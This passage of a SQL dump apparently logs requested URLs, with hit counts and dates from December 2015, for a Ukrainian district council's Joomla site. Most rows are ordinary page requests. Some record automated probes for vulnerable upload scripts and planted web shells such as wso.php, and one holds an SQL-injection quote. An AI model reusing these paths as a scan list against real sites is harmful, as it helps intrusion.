13:05:01','0000-00-00 00:00:00',301),(22044,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/210-pro-stan-vikonannja-rishennja-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-16 13:05:03','0000-00-00 00:00:00',301),(22045,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/226-pro-zatverdzhennja-rajonnoi-programi-vidpochinku?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-16 13:05:23','0000-00-00 00:00:00',301),(22046,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/234-pro-vnesennja-zmin-do-skladu-rajonnoi-profesijnoi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-16 13:05:34','0000-00-00 00:00:00',301),(22047,'http://www.malyn-rayrada.org.ua/index.php/1181-pro-sklikannya-42-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 14:38:38','0000-00-00 00:00:00',301),(22048,'http://www.malyn-rayrada.org.ua/index.php/184-vitaemo-viktora-kostereva-z-nagorodoju?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:38:42','0000-00-00 00:00:00',301),(22049,'http://www.malyn-rayrada.org.ua/index.php/211-vidbulas-pozachergova-15-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:39:26','0000-00-00 00:00:00',301),(22050,'http://www.malyn-rayrada.org.ua/index.php/218-informacija-pro-dijalnist-likarnjanoi-kasi-u?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:39:30','0000-00-00 00:00:00',301),(22051,'http://www.malyn-rayrada.org.ua/index.php/250-z-peremogoju?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-16 14:39:33','0000-00-00 00:00:00',301),(22052,'http://www.malyn-rayrada.org.ua/index.php/251-vitaemo-iz-svjatom?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:39:36','0000-00-00 00:00:00',301),(22053,'http://www.malyn-rayrada.org.ua/index.php/252-vitaemo-iz-svjatom-pershogo-dzvonika','','','',11,0,'2015-12-16 14:39:38','0000-00-00 00:00:00',301),(22054,'http://www.malyn-rayrada.org.ua/index.php/252-vitaemo-iz-svjatom-pershogo-dzvonika?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:39:39','0000-00-00 00:00:00',301),(22055,'http://www.malyn-rayrada.org.ua/index.php/265-nadhodzhennja-dohodiv-do-bjudzhetu-zhitomirskoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 14:39:44','0000-00-00 00:00:00',301),(22056,'http://www.malyn-rayrada.org.ua/index.php/281-vidbulas-11-sesija-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:39:45','0000-00-00 00:00:00',301),(22057,'http://www.malyn-rayrada.org.ua/index.php/302-do-vidoma-zhiteliv-rajonu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:39:48','0000-00-00 00:00:00',301),(22058,'http://www.malyn-rayrada.org.ua/index.php/303-novij-direktor-malinskoi-ditjachoi-shkoli-mistectv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:39:50','0000-00-00 00:00:00',301),(22059,'http://www.malyn-rayrada.org.ua/index.php/308-u-2011-roci-kiiv-donecka-ta-luganska-oblasti?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-16 14:39:53','0000-00-00 00:00:00',301),(22060,'http://www.malyn-rayrada.org.ua/index.php/31-vistup-ansamblju-kozackoi-pisni-malichi-24-serpnja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:39:56','0000-00-00 00:00:00',301),(22061,'http://www.malyn-rayrada.org.ua/index.php/387-zaversheno-pidgotovku-do-provedennja-chergovoi_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 14:39:59','0000-00-00 00:00:00',301),(22062,'http://www.malyn-rayrada.org.ua/index.php/388-vidbulas-16-sesija-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 14:40:01','0000-00-00 00:00:00',301),(22063,'http://www.malyn-rayrada.org.ua/index.php/391-pershi-oficijni-rezultati-viboriv_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 14:40:02','0000-00-00 00:00:00',301),(22064,'http://www.malyn-rayrada.org.ua/index.php/401-predstavleno-kerivnika-kp-malinska-rajonna?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 14:40:11','0000-00-00 00:00:00',301),(22065,'http://www.malyn-rayrada.org.ua/index.php/422-rezultati-viboriv-v-skuratah','','','',17,0,'2015-12-16 14:40:12','0000-00-00 00:00:00',301),(22066,'http://www.malyn-rayrada.org.ua/index.php/422-rezultati-viboriv-v-skuratah?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:40:14','0000-00-00 00:00:00',301),(22067,'http://www.malyn-rayrada.org.ua/index.php/439-do-vidoma-sub-ektiv-pidpriemnickoi-dijalnosti?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 14:40:17','0000-00-00 00:00:00',301),(22068,'http://www.malyn-rayrada.org.ua/index.php/456-vikonannja-dohidnoi-chastini-bjudzhetiv-za-2012?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:40:19','0000-00-00 00:00:00',301),(22069,'http://www.malyn-rayrada.org.ua/index.php/463-sogodni-pravoslavni-hristijani-vidznachajut-verbnu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:40:21','0000-00-00 00:00:00',301),(22070,'http://www.malyn-rayrada.org.ua/index.php/470-pro-vidznachennja-derzhavnimi-nagorodami-ukraini-z?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:40:23','0000-00-00 00:00:00',301),(22071,'http://www.malyn-rayrada.org.ua/index.php/52-vitaemo-iz-pershim-dnem-vesni?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 14:40:33','0000-00-00 00:00:00',301),(22072,'http://www.malyn-rayrada.org.ua/index.php/522-nardep-v-s-zhuravskij-prosit-vid-m-ja-azarova?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-16 14:40:34','0000-00-00 00:00:00',301),(22073,'http://malyn-rayrada.org.ua/attachments/005_history malyn region2.PDF','','','',2,0,'2015-12-16 16:21:06','0000-00-00 00:00:00',301),(22074,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=420:2011-09-30-09-25-52&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2015-12-16 17:50:38','0000-00-00 00:00:00',301),(22075,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/131-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-16 22:23:08','0000-00-00 00:00:00',301),(22076,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=32&Itemid=64&lang=ru','','','',5,0,'2015-12-17 00:08:29','0000-00-00 00:00:00',301),(22083,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=770:---------2012-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-12-17 10:37:57','0000-00-00 00:00:00',301),(22099,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/785-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_2','','','',5,0,'2015-12-17 19:44:50','0000-00-00 00:00:00',301),(22100,'http://www.malyn-rayrada.org.ua/index.php?id=47&Itemid=86&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-18 01:53:54','0000-00-00 00:00:00',301),(22101,'http://www.malyn-rayrada.org.ua/administrator/components/com_rokdownloads/assets/uploadhandler.php','','','',1,0,'2015-12-18 02:36:09','0000-00-00 00:00:00',301),(22102,'http://www.malyn-rayrada.org.ua/components/com_agileplmform/views/agileplmform/js/uploadify.php','','','',1,0,'2015-12-18 02:36:30','0000-00-00 00:00:00',301),(22103,'http://www.malyn-rayrada.org.ua/sites/default/files/tmp/','','','',1,0,'2015-12-18 02:36:36','0000-00-00 00:00:00',301),(22104,'http://www.malyn-rayrada.org.ua/modules/pm_advancedsearch4/js/uploadify/uploadify.php','','','',1,0,'2015-12-18 02:36:42','0000-00-00 00:00:00',301),(22105,'http://www.malyn-rayrada.org.ua/media/uploadify/uploadify.php','','','',1,0,'2015-12-18 02:36:51','0000-00-00 00:00:00',301),(22106,'http://www.malyn-rayrada.org.ua/administrator/components/com_extplorer/uploadhandler.php','','','',1,0,'2015-12-18 02:36:57','0000-00-00 00:00:00',301),(22107,'http://www.malyn-rayrada.org.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2015-12-18 02:37:03','0000-00-00 00:00:00',301),(22108,'http://www.malyn-rayrada.org.ua/components/com_pinboard/popup/popup.php?option=showupload','','','',1,0,'2015-12-18 02:37:20','0000-00-00 00:00:00',301),(22109,'http://www.malyn-rayrada.org.ua/components/com_joomsport/includes/imgres.php','','','',1,0,'2015-12-18 02:37:25','0000-00-00 00:00:00',301),(22110,'http://www.malyn-rayrada.org.ua/modules/mod_artuploader/upload.php','','','',1,0,'2015-12-18 02:37:31','0000-00-00 00:00:00',301),(22111,'http://www.malyn-rayrada.org.ua/plugins/editors/idoeditor/themes/advanced/php/image.php','','','',1,0,'2015-12-18 02:37:36','0000-00-00 00:00:00',301),(22112,'http://www.malyn-rayrada.org.ua/administrator/components/com_simplephotogallery/lib/uploadFile.php','','','',3,0,'2015-12-18 02:37:50','0000-00-00 00:00:00',301),(22113,'http://www.malyn-rayrada.org.ua/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-12-18 02:37:58','0000-00-00 00:00:00',301),(22114,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-12-18 06:51:49','0000-00-00 00:00:00',301),(22115,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=ru&limitstart=5','','','',2,0,'2015-12-18 06:52:19','0000-00-00 00:00:00',301),(22116,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=770:-2012-2015-&catid=45:--14112012-&Itemid=84&lang=uk','','','',1,0,'2015-12-18 06:52:20','0000-00-00 00:00:00',301),(22117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=597:-l-r-2011-&catid=40:--28032012-&Itemid=77&lang=uk','','','',1,0,'2015-12-18 06:52:20','0000-00-00 00:00:00',301),(22118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=244:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-12-18 08:57:01','0000-00-00 00:00:00',301),(22119,'http://malyn-rayrada.org.ua/libraries/joomla/exporter.php','','http://malyn-rayrada.org.ua/','',41,0,'2015-12-18 09:50:54','0000-00-00 00:00:00',301),(22120,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=350:-----l---28r----&Itemid=68&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 12:45:58','0000-00-00 00:00:00',301),(22121,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1336:2014-06-10-11-01-06&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 12:46:43','0000-00-00 00:00:00',301),(22122,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1317:2014-05-25-18-25-09&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 12:47:04','0000-00-00 00:00:00',301),(22123,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=965:2013-03-14-10-56-03&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 12:47:16','0000-00-00 00:00:00',301),(22124,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1165:-2014-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=14&lang=uk','','','',1,0,'2015-12-18 12:59:47','0000-00-00 00:00:00',301),(22125,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=555:2012-01-27-13-50-13&Itemid=76&lang=en&option=com_content&view=article','','','',1,0,'2015-12-18 13:11:25','0000-00-00 00:00:00',301),(22126,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=736:2012-07-18-13-34-35&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-18 13:18:22','0000-00-00 00:00:00',301),(22127,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1185:2014-01-28-09-38-54&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-18 13:19:03','0000-00-00 00:00:00',301),(22128,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=948:-2012-&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2015-12-18 13:53:30','0000-00-00 00:00:00',301),(22129,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=762:-210-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 13:54:14','0000-00-00 00:00:00',301),(22130,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1172:2014-01-14-14-46-07&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 13:54:44','0000-00-00 00:00:00',301),(22131,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=700:-2012-2015-&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 13:54:53','0000-00-00 00:00:00',301),(22132,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 13:55:43','0000-00-00 00:00:00',301),(22133,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=613:2012-03-26-14-13-34&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-18 13:56:01','0000-00-00 00:00:00',301),(22134,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1154:7-&lang=en&option=com_content&view=article','','','',2,0,'2015-12-18 13:56:26','0000-00-00 00:00:00',301),(22135,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=671:2012-05-09-13-09-05&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-18 13:56:34','0000-00-00 00:00:00',301),(22136,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1193:-2014-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 13:56:49','0000-00-00 00:00:00',301),(22137,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1109:2013-10-18-10-25-30&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-18 13:57:24','0000-00-00 00:00:00',301),(22138,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=593:-lr&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-18 13:57:33','0000-00-00 00:00:00',301),(22139,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=670:2012-05-08-05-15-51&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 13:58:35','0000-00-00 00:00:00',301),(22140,'http://www.malyn-rayrada.org.ua/index.php?catid=35:2011-06-30-10-56-57&id=359:2011-06-30-11-10-42&Itemid=69&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-18 14:08:33','0000-00-00 00:00:00',301),(22141,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-18 14:22:09','0000-00-00 00:00:00',301),(22142,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=875:-2013-&Itemid=86&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 14:31:48','0000-00-00 00:00:00',301),(22143,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1141:2013-11-26-13-18-12&Itemid=95&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-18 14:32:19','0000-00-00 00:00:00',301),(22144,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=828:-q-q&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:32:40','0000-00-00 00:00:00',301),(22145,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=465:-l-r-2011-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:32:58','0000-00-00 00:00:00',301),(22146,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1150:2013-11-28-14-53-17&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-18 14:33:16','0000-00-00 00:00:00',301),(22147,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1306:2014-04-30-09-40-02&Itemid=105&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:33:26','0000-00-00 00:00:00',301),(22148,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=815:-16-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-18 14:33:56','0000-00-00 00:00:00',301),(22149,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=924:2013-02-20-19-06-08&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-18 14:34:13','0000-00-00 00:00:00',301),(22150,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=844:-2013-&Itemid=85&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:34:20','0000-00-00 00:00:00',301),(22151,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=928:2013-02-21-09-10-17&Itemid=86&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:34:30','0000-00-00 00:00:00',301),(22152,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 14:34:36','0000-00-00 00:00:00',301),(22153,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1174:-2013-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-18 14:34:44','0000-00-00 00:00:00',301),(22154,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-18 14:34:59','0000-00-00 00:00:00',301),(22155,'http://www.malyn-rayrada.org.ua/index.php?id=35&Itemid=69&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2015-12-18 14:35:06','0000-00-00 00:00:00',301),(22156,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=870:2012-12-17-07-02-51&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:36:19','0000-00-00 00:00:00',301),(22157,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1186:-2013-i-2014-&Itemid=97&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:36:50','0000-00-00 00:00:00',301),(22158,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=319:-2009-2011-&Itemid=66&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 14:37:04','0000-00-00 00:00:00',301),(22159,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=270:-4-6-&Itemid=62&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 14:37:31','0000-00-00 00:00:00',301),(22160,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=408:------------------2011-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-18 14:38:04','0000-00-00 00:00:00',301),(22161,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1336:2014-06-10-11-01-06&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-18 14:38:29','0000-00-00 00:00:00',301),(22162,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=449:2011-10-28-08-04-47&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-18 14:38:39','0000-00-00 00:00:00',301),(22163,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:39:09','0000-00-00 00:00:00',301),(22164,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=985:2013-04-12-09-53-08&Itemid=88&lang=en&option=com_content&view=article','','','',1,0,'2015-12-18 14:39:41','0000-00-00 00:00:00',301),(22165,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=198:------------2006-2010-r&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-18 14:39:47','0000-00-00 00:00:00',301),(22167,'http://www.malyn-rayrada.org.ua/index.php?id=45:--14112012-&Itemid=3&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',4,0,'2015-12-18 14:40:07','0000-00-00 00:00:00',301),(22168,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1156:2013-12-09-07-12-03&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-18 14:40:19','0000-00-00 00:00:00',301),(22169,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1188:2014-01-28-09-45-21&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-18 14:40:21','0000-00-00 00:00:00',301),(22170,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=552:2012-01-26-12-47-12&Itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-18 14:40:27','0000-00-00 00:00:00',301),(22171,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=885:-2013-2015-&Itemid=85&lang=en&option=com_content&view=article','','','',1,0,'2015-12-18 14:40:29','0000-00-00 00:00:00',301),(22172,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=676:2012-05-17-09-52-12&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-18 14:40:33','0000-00-00 00:00:00',301),(22173,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1342:2014-06-12-09-42-47&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-18 14:40:37','0000-00-00 00:00:00',301),(22174,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/110-pro-zatverdzhennja-novogo-skladu-komisii-rajonnoi','','','',7,0,'2015-12-18 16:09:56','0000-00-00 00:00:00',301),(22175,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/zais.jpg','','','',1,0,'2015-12-18 16:37:27','0000-00-00 00:00:00',301),(22176,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=71:2010-07-26-08-03-54&catid=11&Itemid=16&lang=en','','','',1,0,'2015-12-18 18:25:00','0000-00-00 00:00:00',301),(22177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=71:2010-07-26-08-03-54&catid=11&Itemid=16&lang=ru','','','',1,0,'2015-12-18 21:09:26','0000-00-00 00:00:00',301),(22179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:-2012-2015-&catid=38&Itemid=73&lang=uk','','','',7,0,'2015-12-19 07:00:59','0000-00-00 00:00:00',301),(22180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=93:-----------2007-2010-&catid=26:--11082010-&Itemid=54&lang=uk','','','',5,0,'2015-12-19 09:16:13','0000-00-00 00:00:00',301),(22182,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?start=7','','','',2,0,'2015-12-19 11:40:56','0000-00-00 00:00:00',301),(22185,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16&Itemid=39&lang=uk','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=907.F-pSsh2e0WEi8-Onyvfk6WcahA5t5zNguv2hl9iwdbKLAgERuNBdufnuDqPg47odOLzP','',11,0,'2015-12-19 15:18:47','0000-00-00 00:00:00',301),(22187,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=310:-2011-&catid=33&Itemid=66&lang=uk','','','',2,0,'2015-12-20 13:47:19','0000-00-00 00:00:00',301),(22189,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=680:2012-05-17-10-02-41&catid=42:--16052012-&Itemid=80&lang=uk','','','',3,0,'2015-12-20 18:00:25','0000-00-00 00:00:00',301),(22190,'http://malyn-rayrada.org.ua/attachments/article/945/Матеріали Буркуш.pdf','','','',2,0,'2015-12-20 21:00:32','0000-00-00 00:00:00',301),(22191,'http://malyn-rayrada.org.ua/index.php?option=com_content\'A=0&view=article&id=415:-l-r-2011-&catid=37&Itemid=72&lang=uk','','http://malyn-rayrada.org.ua/index.php?option=com_content\'A=0&view=article&id=415:-l-r-2011-&catid=37&Itemid=72&lang=uk','',1,0,'2015-12-20 22:26:55','0000-00-00 00:00:00',301),(22192,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?start=14','','','',3,0,'2015-12-21 00:28:05','0000-00-00 00:00:00',301),(22193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=309:----5----6--20--2011-&catid=33&Itemid=66&lang=uk','','','',2,0,'2015-12-21 03:11:37','0000-00-00 00:00:00',301),(22194,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=579:-2011-2015-&catid=40&Itemid=77&lang=uk','','','',9,0,'2015-12-21 09:01:00','0000-00-00 00:00:00',301),(22195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=uk&limitstart=10','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Byandsearch%3Bweb%3B%3B&text=&etext=909.HLe0AD0uEVNEesH5Vfy6_RWW9xw9qmgzmnWzvAnRCGpVlI8lnih6peMUCGm8dj-c','',24,0,'2015-12-21 09:03:40','0000-00-00 00:00:00',301),(22197,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-?limitstart=0','','','',3,0,'2015-12-21 12:59:35','0000-00-00 00:00:00',301),(22198,'http://malyn-rayrada.org.ua/images/wso.php','','','',2,0,'2015-12-21 14:06:47','0000-00-00 00:00:00',301),(22199,'http://malyn-rayrada.org.ua/images/wso2.php','','','',2,0,'2015-12-21 14:06:47','0000-00-00 00:00:00',301),(22200,'http://malyn-rayrada.org.ua/images/img.php','','','',2,0,'2015-12-21 14:06:48','0000-00-00 00:00:00',301),(22201,'http://malyn-rayrada.org.ua/cache/cache.php','','','',1,0,'2015-12-21 17:50:13','0000-00-00 00:00:00',301),(22202,'http://malyn-rayrada.org.ua/cache/clean.php','','','',1,0,'2015-12-21 17:50:14','0000-00-00 00:00:00',301),(22203,'http://malyn-rayrada.org.ua/logs/logger.php','','','',1,0,'2015-12-21 17:50:14','0000-00-00 00:00:00',301),(22204,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-','','','',1,0,'2015-12-21 19:50:59','0000-00-00 00:00:00',301),(22205,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=21','','','',2,0,'2015-12-21 19:51:10','0000-00-00 00:00:00',301),(22206,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=7','','','',4,0,'2015-12-21 19:51:15','0000-00-00 00:00:00',301),(22207,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=uk&start=7','','','',4,0,'2015-12-21 19:51:42','0000-00-00 00:00:00',301),(22208,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=767:2012-10-01-08-20-30&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 03:53:25','0000-00-00 00:00:00',301),(22209,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 03:53:43','0000-00-00 00:00:00',301),(22210,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1329:2014-06-02-11-51-47&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 03:53:48','0000-00-00 00:00:00',301),(22211,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=960:-19-&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 03:54:11','0000-00-00 00:00:00',301),(22212,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=480:2011-11-28-10-11-58&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 03:54:34','0000-00-00 00:00:00',301),(22213,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=765:-qq&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 03:54:39','0000-00-00 